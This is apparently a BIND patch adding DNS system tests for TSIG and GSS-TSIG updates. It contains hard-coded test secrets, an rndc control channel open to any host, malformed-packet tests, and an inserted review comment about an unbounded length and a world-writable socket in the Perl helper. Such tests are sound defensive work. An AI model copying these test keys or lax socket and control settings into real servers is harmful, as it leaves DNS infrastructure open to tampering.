+SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +$SHELL clean.sh + +copy_setports ns1/named.conf.in ns1/named.conf + +if $FEATURETEST --md5 +then + cat >> ns1/named.conf << EOF +# Conditionally included when support for MD5 is available +key "md5" { + secret "97rnFx24Tfna4mHPfgnerA=="; + algorithm hmac-md5; +}; + +key "md5-trunc" { + secret "97rnFx24Tfna4mHPfgnerA=="; + algorithm hmac-md5-80; +}; +EOF +fi 
diff --git a/bin/tests/system/tsig/tests.sh b/bin/tests/system/tsig/tests.sh new file mode 100644 index 0000000..affc6d0 --- /dev/null +++ b/bin/tests/system/tsig/tests.sh 
@@ -0,0 +1,262 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +DIGOPTS="+tcp +nosea +nostat +noquest +nocomm +nocmd -p ${PORT}" + +# +# Shared secrets. +# +md5="97rnFx24Tfna4mHPfgnerA==" +sha1="FrSt77yPTFx6hTs4i2tKLB9LmE0=" +sha224="hXfwwwiag2QGqblopofai9NuW28q/1rH4CaTnA==" +sha256="R16NojROxtxH/xbDl//ehDsHm5DjWTQ2YXV+hGC2iBY=" +sha384="OaDdoAk2LAcLtYeUnsT7A9XHjsb6ZEma7OCvUpMraQIJX6HetGrlKmF7yglO1G2h" +sha512="jI/Pa4qRu96t76Pns5Z/Ndxbn3QCkwcxLOgt9vgvnJw5wqTRvNyk3FtD6yIMd1dWVlqZ+Y4fe6Uasc0ckctEmg==" + +status=0 + +if $FEATURETEST --md5 +then + echo_i "fetching using hmac-md5 (old form)" + ret=0 + $DIG $DIGOPTS example.nil. -y "md5:$md5" @10.53.0.1 soa > dig.out.md5.old || ret=1 + grep -i "md5.*TSIG.*NOERROR" dig.out.md5.old > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi + + echo_i "fetching using hmac-md5 (new form)" + ret=0 + $DIG $DIGOPTS example.nil. -y "hmac-md5:md5:$md5" @10.53.0.1 soa > dig.out.md5.new || ret=1 + grep -i "md5.*TSIG.*NOERROR" dig.out.md5.new > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +else + echo_i "skipping using hmac-md5" +fi + +echo_i "fetching using hmac-sha1" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha1:sha1:$sha1" @10.53.0.1 soa > dig.out.sha1 || ret=1 +grep -i "sha1.*TSIG.*NOERROR" dig.out.sha1 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha224" +ret=0 +$DIG $DIGOPTS example.nil. 
-y "hmac-sha224:sha224:$sha224" @10.53.0.1 soa > dig.out.sha224 || ret=1 +grep -i "sha224.*TSIG.*NOERROR" dig.out.sha224 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha256" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha256:sha256:$sha256" @10.53.0.1 soa > dig.out.sha256 || ret=1 +grep -i "sha256.*TSIG.*NOERROR" dig.out.sha256 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha384" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha384:sha384:$sha384" @10.53.0.1 soa > dig.out.sha384 || ret=1 +grep -i "sha384.*TSIG.*NOERROR" dig.out.sha384 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha512" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha512:sha512:$sha512" @10.53.0.1 soa > dig.out.sha512 || ret=1 +grep -i "sha512.*TSIG.*NOERROR" dig.out.sha512 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +# +# +# Truncated TSIG +# +# +if $FEATURETEST --md5 +then + echo_i "fetching using hmac-md5 (trunc)" + ret=0 + $DIG $DIGOPTS example.nil. -y "hmac-md5-80:md5-trunc:$md5" @10.53.0.1 soa > dig.out.md5.trunc || ret=1 + grep -i "md5-trunc.*TSIG.*NOERROR" dig.out.md5.trunc > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +else + echo_i "skipping using hmac-md5 (trunc)" +fi + +echo_i "fetching using hmac-sha1 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha1-80:sha1-trunc:$sha1" @10.53.0.1 soa > dig.out.sha1.trunc || ret=1 +grep -i "sha1.*TSIG.*NOERROR" dig.out.sha1.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha224 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. 
-y "hmac-sha224-112:sha224-trunc:$sha224" @10.53.0.1 soa > dig.out.sha224.trunc || ret=1 +grep -i "sha224-trunc.*TSIG.*NOERROR" dig.out.sha224.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha256 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha256-128:sha256-trunc:$sha256" @10.53.0.1 soa > dig.out.sha256.trunc || ret=1 +grep -i "sha256-trunc.*TSIG.*NOERROR" dig.out.sha256.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha384 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha384-192:sha384-trunc:$sha384" @10.53.0.1 soa > dig.out.sha384.trunc || ret=1 +grep -i "sha384-trunc.*TSIG.*NOERROR" dig.out.sha384.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha512-256 (trunc)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha512-256:sha512-trunc:$sha512" @10.53.0.1 soa > dig.out.sha512.trunc || ret=1 +grep -i "sha512-trunc.*TSIG.*NOERROR" dig.out.sha512.trunc > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + + +# +# +# Check for bad truncation. +# +# +if $FEATURETEST --md5 +then + echo_i "fetching using hmac-md5-80 (BADTRUNC)" + ret=0 + $DIG $DIGOPTS example.nil. -y "hmac-md5-80:md5:$md5" @10.53.0.1 soa > dig.out.md5-80 || ret=1 + grep -i "md5.*TSIG.*BADTRUNC" dig.out.md5-80 > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +else + echo_i "skipping using hmac-md5-80 (BADTRUNC)" +fi + +echo_i "fetching using hmac-sha1-80 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha1-80:sha1:$sha1" @10.53.0.1 soa > dig.out.sha1-80 || ret=1 +grep -i "sha1.*TSIG.*BADTRUNC" dig.out.sha1-80 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha224-112 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. 
-y "hmac-sha224-112:sha224:$sha224" @10.53.0.1 soa > dig.out.sha224-112 || ret=1 +grep -i "sha224.*TSIG.*BADTRUNC" dig.out.sha224-112 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha256-128 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha256-128:sha256:$sha256" @10.53.0.1 soa > dig.out.sha256-128 || ret=1 +grep -i "sha256.*TSIG.*BADTRUNC" dig.out.sha256-128 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha384-192 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha384-192:sha384:$sha384" @10.53.0.1 soa > dig.out.sha384-192 || ret=1 +grep -i "sha384.*TSIG.*BADTRUNC" dig.out.sha384-192 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "fetching using hmac-sha512-256 (BADTRUNC)" +ret=0 +$DIG $DIGOPTS example.nil. -y "hmac-sha512-256:sha512:$sha512" @10.53.0.1 soa > dig.out.sha512-256 || ret=1 +grep -i "sha512.*TSIG.*BADTRUNC" dig.out.sha512-256 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "attempting fetch with bad tsig algorithm" +ret=0 +$DIG $DIGOPTS example.nil. 
-y "badalgo:invalid:$sha512" @10.53.0.1 soa > dig.out.badalgo 2>&1 || ret=1 +grep -i "Couldn't create key invalid: algorithm is unsupported" dig.out.badalgo > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "checking both OPT and TSIG records are returned when TC=1" +ret=0 +$DIG -p ${PORT} +ignore +bufsize=512 large.example.nil -y "hmac-sha1:sha1:$sha1" @10.53.0.1 txt > dig.out.large 2>&1 || ret=1 +grep "flags:.* tc[ ;]" dig.out.large > /dev/null || ret=1 +grep "status: NOERROR" dig.out.large > /dev/null || ret=1 +grep "EDNS:" dig.out.large > /dev/null || ret=1 +grep -i "sha1.*TSIG.*NOERROR" dig.out.sha1 > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "check that dnssec-keygen won't generate TSIG keys" +ret=0 +$KEYGEN -a hmac-sha256 -b 128 -n host example.net > keygen.out3 2>&1 && ret=1 +grep "unknown algorithm" keygen.out3 > /dev/null || ret=1 + +echo_i "check that a 'BADTIME' response with 'QR=0' is handled as a request" +ret=0 +$PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t tcp < badtime > /dev/null || ret=1 +$DIG -p ${PORT} @10.53.0.1 version.bind txt ch > dig.out.verify || ret=1 +grep "status: NOERROR" dig.out.verify > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +if "$PERL" -e 'use Net::DNS; use Net::DNS::Packet;' > /dev/null 2>&1 +then + echo_i "check that TSIG in the wrong place returns FORMERR" + ret=0 + $PERL ../packet.pl -a 10.53.0.1 -p ${PORT} -t udp -d < badlocation > packet.out + grep "rcode = FORMERR" packet.out > /dev/null || ret=1 + if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 + fi +fi + +echo_i "check that a malformed truncated response to a TSIG query is handled" +ret=0 +$DIG -p $PORT @10.53.0.1 bad-tsig > dig.out.bad-tsig || ret=1 +grep "status: SERVFAIL" dig.out.bad-tsig > /dev/null || ret=1 +if [ $ret -eq 1 ] ; then + echo_i "failed"; status=1 +fi + +echo_i "exit status: $status" +[ $status -eq 0 ] || exit 1 
diff --git a/bin/tests/system/tsiggss/authsock.pl b/bin/tests/system/tsiggss/authsock.pl
new file mode 100644
index 0000000..d629c65
--- /dev/null
+++ b/bin/tests/system/tsiggss/authsock.pl
@@ -0,0 +1,96 @@ +#!/usr/bin/env perl + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# test the update-policy external protocol + +require 5.6.0; + +use IO::Socket::UNIX; +use Getopt::Long; + +my $path; +my $typeallowed = "A"; +my $pidfile = "authsock.pid"; +my $timeout = 0; + +GetOptions("path=s" => \$path, + "type=s" => \$typeallowed, + "pidfile=s" => \$pidfile, + "timeout=i" => \$timeout); + +if (!defined($path)) { + print("Usage: authsock.pl --path=<sockpath> --type=type --pidfile=pidfile\n"); + exit(1); +} + +unlink($path); +my $server = IO::Socket::UNIX->new(Local => $path, Type => SOCK_STREAM, Listen => 8) or + die "unable to create socket $path"; +chmod 0777, $path; + +# setup our pidfile +open(my $pid,">",$pidfile) + or die "unable to open pidfile $pidfile"; +print $pid "$$\n"; +close($pid); + +# close gracefully +sub rmpid { unlink "$pidfile"; exit 1; }; +$SIG{INT} = \&rmpid; +$SIG{TERM} = \&rmpid; + +if ($timeout != 0) { + # die after the given timeout + alarm($timeout); +} + +while (my $client = $server->accept()) { + $client->recv(my $buf, 8, 0); + my ($version, $req_len) = unpack('N N', $buf); + + if ($version != 1 || $req_len < 17) { + printf("Badly formatted request\n"); + $client->send(pack('N', 2)); + next; + } + + $client->recv(my $buf, $req_len - 8, 0); + + my ($signer, + $name, + $addr, + $type, + $key, + $key_data) = unpack('Z* Z* Z* Z* Z* N/a', $buf); + + if ($req_len != length($buf)+8) { + printf("Length mismatch %u %u\n", $req_len, length($buf)+8); + $client->send(pack('N', 2)); + next; + } + + printf("version=%u signer=%s name=%s addr=%s type=%s key=%s 
key_data_len=%u\n", + $version, $signer, $name, $addr, $type, $key, length($key_data)); + + my $result; + if ($typeallowed eq $type) { + $result = 1; + printf("allowed type %s == %s\n", $type, $typeallowed); + } else { + printf("disallowed type %s != %s\n", $type, $typeallowed); + $result = 0; + } + + $reply = pack('N', $result); + $client->send($reply); +} diff --git a/bin/tests/system/tsiggss/clean.sh b/bin/tests/system/tsiggss/clean.sh new file mode 100644 index 0000000..0ace209 --- /dev/null +++ b/bin/tests/system/tsiggss/clean.sh @@ -0,0 +1,28 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# +# Clean up after tsiggss tests. +# + +rm -f ns1/*.jnl ns1/update.txt ns1/auth.sock +rm -f ns1/*.db ns1/K*.key ns1/K*.private +rm -f ns1/_default.tsigkeys +rm -f */named.memstats +rm -f */named.conf +rm -f */named.run +rm -f authsock.pid +rm -f ns1/core +rm -f nsupdate.out* +rm -f ns*/named.lock +rm -f ns*/managed-keys.bind* diff --git a/bin/tests/system/tsiggss/ns1/administrator.ccache b/bin/tests/system/tsiggss/ns1/administrator.ccache Binary files differnew file mode 100644 index 0000000..e6c2e74 --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/administrator.ccache diff --git a/bin/tests/system/tsiggss/ns1/dns.keytab b/bin/tests/system/tsiggss/ns1/dns.keytab Binary files differnew file mode 100644 index 0000000..dcb863b --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/dns.keytab diff --git a/bin/tests/system/tsiggss/ns1/example.nil.db.in b/bin/tests/system/tsiggss/ns1/example.nil.db.in new file mode 100644 index 0000000..536ef29 --- /dev/null 
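Review bot: The accept loop in authsock.pl trusts the peer-supplied `$req_len`: it is checked only against a lower bound of 17 before `$req_len - 8` becomes the size of the second `recv`, and the socket was opened to every local user with `chmod 0777, $path` just above. Since the field is unpacked as a 32-bit `N`, a peer can presumably make Perl size that buffer for several gigabytes; an upper bound such as `if ($version != 1 || $req_len < 17 || $req_len > $max_req_len) {` (with `$max_req_len` a placeholder for a limit suited to the update-policy protocol) and a socket mode no wider than named needs would keep the helper predictable on shared CI hosts. The script also lacks `use strict; use warnings;`, which would have flagged the second `my $buf` in the same scope and the undeclared `$reply`.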
+++ b/bin/tests/system/tsiggss/ns1/example.nil.db.in 
@@ -0,0 +1,62 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +; -*- zone -*- +; this was generated by a Samba4 provision, and is typical +; of a AD DNS zone +$ORIGIN example.nil. +$TTL 1W +@ IN SOA blu hostmaster ( + 2010113027 ; serial + 2D ; refresh + 4H ; retry + 6W ; expiry + 1W ) ; minimum + IN NS blu + + IN A 10.53.0.1 +; + +blu IN A 10.53.0.1 +gc._msdcs IN A 10.53.0.1 + +fb33eb58-5d58-4100-a114-256e0a97ffc1._msdcs IN CNAME blu +; +; global catalog servers +_gc._tcp IN SRV 0 100 3268 blu +_gc._tcp.Default-First-Site-Name._sites IN SRV 0 100 3268 blu +_ldap._tcp.gc._msdcs IN SRV 0 100 3268 blu +_ldap._tcp.Default-First-Site-Name._sites.gc._msdcs IN SRV 0 100 3268 blu +; +; ldap servers +_ldap._tcp IN SRV 0 100 389 blu +_ldap._tcp.dc._msdcs IN SRV 0 100 389 blu +_ldap._tcp.pdc._msdcs IN SRV 0 100 389 blu +_ldap._tcp.d86745b4-f3e0-4af3-be03-2130d1534be8.domains._msdcs IN SRV 0 100 389 blu +_ldap._tcp.Default-First-Site-Name._sites IN SRV 0 100 389 blu +_ldap._tcp.Default-First-Site-Name._sites.dc._msdcs IN SRV 0 100 389 blu +; +; krb5 servers +_kerberos._tcp IN SRV 0 100 88 blu +_kerberos._tcp.dc._msdcs IN SRV 0 100 88 blu +_kerberos._tcp.Default-First-Site-Name._sites IN SRV 0 100 88 blu +_kerberos._tcp.Default-First-Site-Name._sites.dc._msdcs IN SRV 0 100 88 blu +_kerberos._udp IN SRV 0 100 88 blu +; MIT kpasswd likes to lookup this name on password change +_kerberos-master._tcp IN SRV 0 100 88 blu +_kerberos-master._udp IN SRV 0 100 88 blu +; +; kpasswd +_kpasswd._tcp IN SRV 0 100 464 blu +_kpasswd._udp IN SRV 0 100 464 blu +; +; heimdal 'find realm for host' hack +_kerberos IN TXT 
EXAMPLE.NIL diff --git a/bin/tests/system/tsiggss/ns1/named.conf.in b/bin/tests/system/tsiggss/ns1/named.conf.in new file mode 100644 index 0000000..1dfa49a --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/named.conf.in @@ -0,0 +1,49 @@ +/* + * Copyright (C) Internet Systems Consortium, Inc. ("ISC") + * + * SPDX-License-Identifier: MPL-2.0 + * + * This Source Code Form is subject to the terms of the Mozilla Public + * License, v. 2.0. If a copy of the MPL was not distributed with this + * file, you can obtain one at https://mozilla.org/MPL/2.0/. + * + * See the COPYRIGHT file distributed with this work for additional + * information regarding copyright ownership. + */ + +options { + query-source address 10.53.0.1; + notify-source 10.53.0.1; + transfer-source 10.53.0.1; + port @PORT@; + pid-file "named.pid"; + session-keyfile "session.key"; + listen-on { 10.53.0.1; 127.0.0.1; }; + listen-on-v6 { none; }; + recursion no; + notify yes; + tkey-gssapi-keytab "dns.keytab"; +}; + +key rndc_key { + secret "1234abcd8765"; + algorithm hmac-sha256; +}; + +controls { + inet 10.53.0.1 port @CONTROLPORT@ allow { any; } keys { rndc_key; }; +}; + +zone "example.nil." IN { + type primary; + file "example.nil.db"; + + update-policy { + grant Administrator@EXAMPLE.NIL wildcard * A AAAA SRV CNAME; + grant testdenied@EXAMPLE.NIL wildcard * TXT; + grant "local:auth.sock" external * CNAME; + }; + + /* we need to use check-names ignore so _msdcs A records can be created */ + check-names ignore; +}; diff --git a/bin/tests/system/tsiggss/ns1/testdenied.ccache b/bin/tests/system/tsiggss/ns1/testdenied.ccache Binary files differnew file mode 100644 index 0000000..070e85b --- /dev/null +++ b/bin/tests/system/tsiggss/ns1/testdenied.ccache diff --git a/bin/tests/system/tsiggss/prereq.sh b/bin/tests/system/tsiggss/prereq.sh new file mode 100644 index 0000000..20ae6b6 --- /dev/null +++ b/bin/tests/system/tsiggss/prereq.sh 
@@ -0,0 +1,23 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+# enable the tsiggss test only if gssapi was enabled
+$FEATURETEST --gssapi || {
+ echo_i "gssapi and krb5 not supported - skipping tsiggss test"
+ exit 255
+}
+
+exit 0
diff --git a/bin/tests/system/tsiggss/setup.sh b/bin/tests/system/tsiggss/setup.sh
new file mode 100644
index 0000000..3b07647
--- /dev/null
+++ b/bin/tests/system/tsiggss/setup.sh
@@ -0,0 +1,22 @@
+#!/bin/sh
+
+# Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+#
+# SPDX-License-Identifier: MPL-2.0
+#
+# This Source Code Form is subject to the terms of the Mozilla Public
+# License, v. 2.0. If a copy of the MPL was not distributed with this
+# file, you can obtain one at https://mozilla.org/MPL/2.0/.
+#
+# See the COPYRIGHT file distributed with this work for additional
+# information regarding copyright ownership.
+
+SYSTEMTESTTOP=..
+. $SYSTEMTESTTOP/conf.sh
+
+$SHELL clean.sh
+
+copy_setports ns1/named.conf.in ns1/named.conf
+
+key=`$KEYGEN -Cq -K ns1 -a $DEFAULT_ALGORITHM -b $DEFAULT_BITS -n HOST -T KEY key.example.nil.`
+cat ns1/example.nil.db.in ns1/${key}.key > ns1/example.nil.db
diff --git a/bin/tests/system/tsiggss/tests.sh b/bin/tests/system/tsiggss/tests.sh
new file mode 100644
index 0000000..2d5dc8e
--- /dev/null
+++ b/bin/tests/system/tsiggss/tests.sh
@@ -0,0 +1,177 @@ +#!/bin/sh + +# Copyright (C) Internet Systems Consortium, Inc. ("ISC") +# +# SPDX-License-Identifier: MPL-2.0 +# +# This Source Code Form is subject to the terms of the Mozilla Public +# License, v. 2.0. If a copy of the MPL was not distributed with this +# file, you can obtain one at https://mozilla.org/MPL/2.0/. +# +# See the COPYRIGHT file distributed with this work for additional +# information regarding copyright ownership. + +# tests for TSIG-GSS updates + +SYSTEMTESTTOP=.. +. $SYSTEMTESTTOP/conf.sh + +status=0 +n=1 + +DIGOPTS="@10.53.0.1 -p ${PORT}" + +test_update () { + num="$1" + host="$2" + type="$3" + cmd="$4" + digout="$5" + + cat <<EOF > ns1/update.txt +server 10.53.0.1 ${PORT} +update add $host $cmd +send +answer +EOF + echo_i "testing update for $host $type $cmd" + $NSUPDATE -g -d ns1/update.txt > nsupdate.out${num} 2>&1 || { + echo_i "update failed for $host $type $cmd" + sed "s/^/I:/" nsupdate.out${num} + return 1 + } + + # Verify that TKEY response is signed. + tkeyout=`awk '/recvmsg reply from GSS-TSIG query/,/Sending update to/' nsupdate.out${num}` + pattern="recvmsg reply from GSS-TSIG query .* opcode: QUERY, status: NOERROR, id: .* flags: qr; QUESTION: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1 ;; QUESTION SECTION: ;.* ANY TKEY ;; ANSWER SECTION: .* 0 ANY TKEY gss-tsig\. .* ;; TSIG PSEUDOSECTION: .* 0 ANY TSIG gss-tsig\. .* NOERROR 0" + echo $tkeyout | grep "$pattern" > /dev/null || { + echo_i "bad tkey response (not tsig signed)" + return 1 + } + + # Weak verification that TKEY response is signed. + grep -q "flags: qr; QUESTION: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1" nsupdate.out${num} || { + echo_i "bad tkey response (not tsig signed)" + return 1 + } + + out=`$DIG $DIGOPTS -t $type -q $host | grep -E "^${host}"` + lines=`echo "$out" | grep "$digout" | wc -l` + [ $lines -eq 1 ] || { + echo_i "dig output incorrect for $host $type $cmd: $out" + return 1 + } + return 0 +} + + +# Testing updates with good credentials. 
+KRB5CCNAME="FILE:"`pwd`/ns1/administrator.ccache +export KRB5CCNAME + +echo_i "testing updates to testdc1 as administrator ($n)" +ret=0 +test_update $n testdc1.example.nil. A "86400 A 10.53.0.10" "10.53.0.10" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing updates to testdc2 as administrator ($n)" +ret=0 +test_update $n testdc2.example.nil. A "86400 A 10.53.0.11" "10.53.0.11" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing updates to denied as administrator ($n)" +ret=0 +test_update $n denied.example.nil. TXT "86400 TXT helloworld" "helloworld" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + + +# Testing denied updates. +KRB5CCNAME="FILE:"`pwd`/ns1/testdenied.ccache +export KRB5CCNAME + +echo_i "testing updates to denied (A) as a user ($n)" +ret=0 +test_update $n testdenied.example.nil. A "86400 A 10.53.0.12" "10.53.0.12" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing updates to denied (TXT) as a user ($n)" +ret=0 +test_update $n testdenied.example.nil. TXT "86400 TXT helloworld" "helloworld" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external update policy (CNAME) ($n)" +ret=0 +test_update $n testcname.example.nil. CNAME "86400 CNAME testdenied.example.nil" "testdenied" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external update policy (CNAME) with auth sock ($n)" +ret=0 +$PERL ./authsock.pl --type=CNAME --path=ns1/auth.sock --pidfile=authsock.pid --timeout=120 > /dev/null 2>&1 & +sleep 1 +test_update $n testcname.example.nil. 
CNAME "86400 CNAME testdenied.example.nil" "testdenied" || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external update policy (A) ($n)" +ret=0 +test_update $n testcname.example.nil. A "86400 A 10.53.0.13" "10.53.0.13" > /dev/null && ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "testing external policy with SIG(0) key ($n)" +ret=0 +$NSUPDATE -k ns1/Kkey.example.nil.*.private <<END > /dev/null 2>&1 || ret=1 +server 10.53.0.1 ${PORT} +zone example.nil +update add fred.example.nil 120 cname foo.bar. +send +END +output=`$DIG $DIGOPTS +short cname fred.example.nil.` +[ -n "$output" ] || ret=1 +[ $ret -eq 0 ] || echo_i "failed" +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "ensure too long realm name is fatal in non-interactive mode ($n)" +ret=0 +$NSUPDATE <<END > nsupdate.out${n} 2>&1 && ret=1 + realm namenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamename 
+END +grep "realm is too long" nsupdate.out${n} > /dev/null || ret=1 +grep "syntax error" nsupdate.out${n} > /dev/null || ret=1 +n=$((n+1)) +if [ "$ret" -ne 0 ]; then echo_i "failed"; fi +status=$((status+ret)) + +echo_i "ensure too long realm name is not fatal in interactive mode ($n)" +ret=0 +$NSUPDATE -i <<END > nsupdate.out${n} 2>&1 || ret=1 + realm namenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamenamename +END +grep "realm is too long" nsupdate.out${n} > /dev/null || ret=1 +[ $ret = 0 ] || { echo_i "failed"; status=1; } +n=$((n+1)) 